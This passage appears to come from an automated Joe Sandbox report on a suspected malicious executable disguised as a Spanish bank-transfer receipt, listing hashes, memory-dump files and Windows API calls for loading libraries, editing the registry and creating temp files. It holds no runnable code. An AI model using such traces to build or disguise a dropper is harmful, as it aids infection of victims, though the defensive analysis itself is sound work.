                                            • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                            • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                            • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                            • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                            • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                            • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                            • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                            • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                            • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                            • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                            • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                            • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                            • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                            • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                            • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                            • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                              • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,00403160), ref: 004051D4
                                              • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll), ref: 004051E6
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FFF
                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 334405425-0
                                            • Opcode ID: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
                                            • Instruction ID: c18903b5dbc92386bcc0ded8fd0819d4ecd3504ae344b6f49c713324e9d388be
                                            • Opcode Fuzzy Hash: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
                                            • Instruction Fuzzy Hash: 8F219831904219EACF20AFA5CE48A9E7E71AF00354F60427BF511B51E1C7BD8E41DA5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000690,00000000,00000022,00000000,?,?), ref: 00402CF1
                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
                                            • Instruction ID: e4ac8c9376200f70c7981abe7f64d2c812767dcd2539a2364c5f8151efcc43ed
                                            • Opcode Fuzzy Hash: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
                                            • Instruction Fuzzy Hash: 75117331915205EBDB14CFA4DA489BEB7B4FF44354F20843FE405B72D0D6B89A41EB5A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                            • Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
                                            • Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                            • Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000690,00000000,00000022,00000000,?,?), ref: 00402CF1
                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CloseDeleteOpenValue
                                            • String ID:
                                            • API String ID: 849931509-0
                                            • Opcode ID: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
                                            • Instruction ID: 619afea56069f31c127a8e11fd0f1f435edbd74989573f139d652fd0604b037d
                                            • Opcode Fuzzy Hash: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
                                            • Instruction Fuzzy Hash: 8AF0AF32A04100ABEB10BFB48A4EABE72699B80314F14843BF501B71D1C9FC9D025629
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                            • Instruction ID: 14d99bf0b22e04dc8d6d27e1a0bb6c10309fac34fbb9e600a12b00824ffe684e
                                            • Opcode Fuzzy Hash: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                            • Instruction Fuzzy Hash: 5EE04F32B001049BCB24CBA8ED808AE77A6AB88320750453FD902B36A0CA74DC51CF28
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                              • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                              • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                              • Part of subcall function 00406384: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                            • Instruction ID: 5dc38b7c1614d08ea85e9237aecc352f838a6b2874e2c17184f6d3a6923fef4e
                                            • Opcode Fuzzy Hash: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                            • Instruction Fuzzy Hash: 02E086326081225BD31157715D4497776A8AA9D640306043EFD06F61C1D774AC219AAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ShowWindow.USER32(00000000,00000000,?), ref: 00401DF2
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
                                            • Instruction ID: c65acc83bfa495384d8d8e75d5cf87c092469090b0d1be5324bf36691b182b4f
                                            • Opcode Fuzzy Hash: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
                                            • Instruction Fuzzy Hash: C1E08C32A04100ABC720AFB5AA8999D3375EF90369B10057BE402F10E1C6BCAC409A2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405BF3
                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405C15
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                            • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                            • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                            • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                            • GetLastError.KERNEL32 ref: 004056D9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                            • Instruction ID: fb2ec3850198e6a3c32e9ec6a0d6f7e4a8645a4513041e6eac74538e2b64e397
                                            • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
